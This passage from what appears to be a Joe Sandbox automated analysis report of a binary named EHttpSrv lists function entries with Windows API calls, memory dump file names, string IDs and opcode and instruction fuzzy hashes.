                                                                                                                • LoadLibraryW.KERNEL32(Kernel32.dll,?,20407F85), ref: 20407F22
                                                                                                                  • Part of subcall function 20478A06: __onexit.MSVCRT ref: 20478A0A
                                                                                                                • GetProcAddress.KERNEL32(76210000,20485DD0), ref: 20407F4D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressLibraryLoadProc__onexit
                                                                                                                • String ID: Kernel32.dll
                                                                                                                • API String ID: 3191664640-1926710522
                                                                                                                • Opcode ID: 182276237d73de789b3110b188e23378c23cb851714cac343eae65dbb068b692
                                                                                                                • Instruction ID: 92a4920863b73ead2e7eac29c162c847a3ef0cf9a536e8aee4fbdd8cccbd758e
                                                                                                                • Opcode Fuzzy Hash: 182276237d73de789b3110b188e23378c23cb851714cac343eae65dbb068b692
                                                                                                                • Instruction Fuzzy Hash: 0FF08270D099234B8200CBF49DD9A463BD66B0861D701C535FA00F6364FA2CC8446B82
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: wcscpy_swcsncpy_s
                                                                                                                • String ID: ${ProfileName}=
                                                                                                                • API String ID: 2961736276-3568326518
                                                                                                                • Opcode ID: 9645f0102fb7c9f4a977f96bbfedd3f02f5f17286875abe5bbfd3782ce1628cf
                                                                                                                • Instruction ID: 35c1f051060d02334839f396f06e384fa197c4b07e658202deac2d0e0b4a0606
                                                                                                                • Opcode Fuzzy Hash: 9645f0102fb7c9f4a977f96bbfedd3f02f5f17286875abe5bbfd3782ce1628cf
                                                                                                                • Instruction Fuzzy Hash: 84E0DF30244A027BE601870CAC0ABF73260CFC8B09F158828F552DA292DA98AA918288
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: wcscpy_swcsncpy_s
                                                                                                                • String ID: NODE;NAME=
                                                                                                                • API String ID: 2961736276-3737436838
                                                                                                                • Opcode ID: 9221e6d5e071d06bcc23d811ee8fb088245b344934b43f02d6b6592d69878a72
                                                                                                                • Instruction ID: 09a811c32454f88a4cbe355f34ba139e64e1809b7de3bf9afe3b07dbb26a51b9
                                                                                                                • Opcode Fuzzy Hash: 9221e6d5e071d06bcc23d811ee8fb088245b344934b43f02d6b6592d69878a72
                                                                                                                • Instruction Fuzzy Hash: 0EE0DF2024AA0063FA104788AC86B463652BF8870EF05DD14F719DF2C5DBAD9B6883C9
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: freememset
                                                                                                                • String ID:
                                                                                                                • API String ID: 2499939622-0
                                                                                                                • Opcode ID: 7ed1fa7bd064699fc94fc603efc9eee1eb75c1e7271c7244f950269077a0b571
                                                                                                                • Instruction ID: d5b3a2db785fefb14b26ed880e5bc61ec4fa5722a994a65ae12af91ff6c10451
                                                                                                                • Opcode Fuzzy Hash: 7ed1fa7bd064699fc94fc603efc9eee1eb75c1e7271c7244f950269077a0b571
                                                                                                                • Instruction Fuzzy Hash: 6F01A7716007085BC3609FEA8DC1A47F7FCEF54A55740891EFA4297A11DBB9F5408BA0